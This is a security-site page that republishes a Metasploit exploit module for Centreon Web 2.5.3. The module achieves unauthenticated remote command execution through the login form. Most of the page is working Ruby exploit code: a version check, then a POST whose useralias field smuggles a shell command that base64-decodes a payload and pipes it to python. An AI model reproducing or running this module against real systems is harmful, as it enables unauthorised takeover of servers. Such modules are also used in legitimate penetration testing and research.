首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Centreon 2.5.3 - Web Useralias Command Execution (Metasploit) 来源：metasploit.com 作者：h00die 发布时间：2016-07-28   ## ## This module requires Metasploit: http://metasploit.com/download ## Current source: https://github.com/rapid7/metasploit-framework ###   require 'msf/core'   class MetasploitModule < Msf::Exploit::Remote   include Msf::Exploit::Remote::HttpClient     Rank = ExcellentRanking   def initialize(info = {})     super(       update_info(         info,         'Name'        => 'Centreon Web Useralias Command Execution',         'Description' => %q(           Centreon Web Interface <= 2.5.3 utilizes an ECHO for logging SQL           errors.  This functionality can be abused for arbitrary code           execution, and can be triggered via the login screen prior to           authentication.         ),         'Author'      =>           [             'h00die <mike@shorebreaksecurity.com>',         # module             'Nicolas CHATELAIN <n.chatelain@sysdream.com>'  # discovery           ],         'References'  =>           [             [ 'EDB', '39501' ]           ],         'License'        => MSF_LICENSE,         'Platform'       => ['python'],         'Privileged'     => false,         'Arch'           => ARCH_PYTHON,         'Targets'        =>           [             [ 'Automatic Target', {}]           ],         'DefaultTarget' => 0,         'DisclosureDate' => 'Feb 26 2016'       )     )       register_options(       [         Opt::RPORT(80),         OptString.new('TARGETURI', [ true, 'The URI of the Centreon Application', '/centreon/'])       ], self.class     )   end     def check     begin       res = send_request_cgi(         'uri'       => normalize_uri(target_uri.path, 'index.php'),         'method'    => 'GET'       )       /LoginInvitVersion"><br \/>[\s]+(?<version>[\d]{1,2}\.[\d]{1,2}\.[\d]{1,2})[\s]+<\/td>/ =~ res.body         if version && Gem::Version.new(version) <= Gem::Version.new('2.5.3')         vprint_good("Version Detected: #{version}")         Exploit::CheckCode::Appears       else         Exploit::CheckCode::Safe       end     rescue ::Rex::ConnectionError       fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")     end   end     def exploit     begin       vprint_status('Sending malicious login')       send_request_cgi(         'uri'       => normalize_uri(target_uri.path, 'index.php'),         'method'    => 'POST',         'vars_post'  =>         {           'useralias'   => "$(echo #{Rex::Text.encode_base64(payload.encoded)} |base64 -d | python)\\",           'password'    => Rex::Text.rand_text_alpha(5)         }       )       rescue ::Rex::ConnectionError       fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")     end   end end   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Barracuda Web App Firewall 8.0 ·AXIS Authenticated Remote Comm ·Bellini/Supercook Wi-Fi Yumi S ·VMWare - Setuid vmware-mount P ·Technicolor TC7200 Modem/Route ·Zortam Media Studio 20.60 Buff ·Ubee EVW3226 Modem/Router 1.0. ·Barracuda Web App Firewall/Loa ·PHP 7.0.8 / 5.6.23 / 5.5.37 - ·VUPlayer 2.49 - (.pls) Stack B ·CoolPlayer+ Portable 2.19.6 - ·Drupal Module Coder < 7.x-1.3   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved